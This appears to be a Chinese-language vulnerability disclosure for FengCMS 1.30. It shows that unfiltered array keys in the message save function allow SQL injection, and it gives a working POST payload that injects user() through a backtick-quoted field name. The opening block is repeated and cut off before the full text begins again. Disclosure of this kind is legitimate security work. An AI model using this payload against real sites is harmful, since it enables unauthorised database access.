### 简要描述: http://www.fengcms.com/ 最新版本1.30 ### 详细说明: app\model\messageModel.php ``` public function save($array){ if($_SESSION['authnum']!=$array['vcode']||$_SESSION['authnum']==""){ return array('status' => 'c');exit;} unset($array['vcode']); $re=D($this->d_name)->insert($array); if($re){ $_SESSION['authnum']=""; return array('status' => 'y','id' => $re); }else{ return array('status' => 'n','id' => $re); } ``` $re=D($this->d_name)->insert($array); 未对数组key过滤。 反引号无视转义。 pyload: POST /?controller=message&operate=save title`,`name`,`qq`,`tel`,`mail`,`content`,`time`)values(user(),qq,qq,qq,qq,qq,1426038685);#insert/**/into/**/`f_message`/**/(`title=testsql&name=&qq=&tel=&mail=&content=aaaaaaaaaaaa&vcode=vzyd&time=1426039319 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201503/11103743036c89090cbbb5d4b50e5c656a0b0210.png" alt="fengcms#1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/11103743036c89090cbbb5d4b50e5c656a0b0210.png) [<img...
### 简要描述: http://www.fengcms.com/ 最新版本1.30 ### 详细说明: app\model\messageModel.php ``` public function save($array){ if($_SESSION['authnum']!=$array['vcode']||$_SESSION['authnum']==""){ return array('status' => 'c');exit;} unset($array['vcode']); $re=D($this->d_name)->insert($array); if($re){ $_SESSION['authnum']=""; return array('status' => 'y','id' => $re); }else{ return array('status' => 'n','id' => $re); } ``` $re=D($this->d_name)->insert($array); 未对数组key过滤。 反引号无视转义。 pyload: POST /?controller=message&operate=save title`,`name`,`qq`,`tel`,`mail`,`content`,`time`)values(user(),qq,qq,qq,qq,qq,1426038685);#insert/**/into/**/`f_message`/**/(`title=testsql&name=&qq=&tel=&mail=&content=aaaaaaaaaaaa&vcode=vzyd&time=1426039319 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201503/11103743036c89090cbbb5d4b50e5c656a0b0210.png" alt="fengcms#1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/11103743036c89090cbbb5d4b50e5c656a0b0210.png) [<img src="https://images.seebug.org/upload/201503/111039099e181f84a5a3442bdcf4ac15accc0562.png" alt="fengcms#2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/111039099e181f84a5a3442bdcf4ac15accc0562.png) [<img src="https://images.seebug.org/upload/201503/11103923e543e4202ed88bbf973ce7be99002606.png" alt="fengcms3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/11103923e543e4202ed88bbf973ce7be99002606.png)
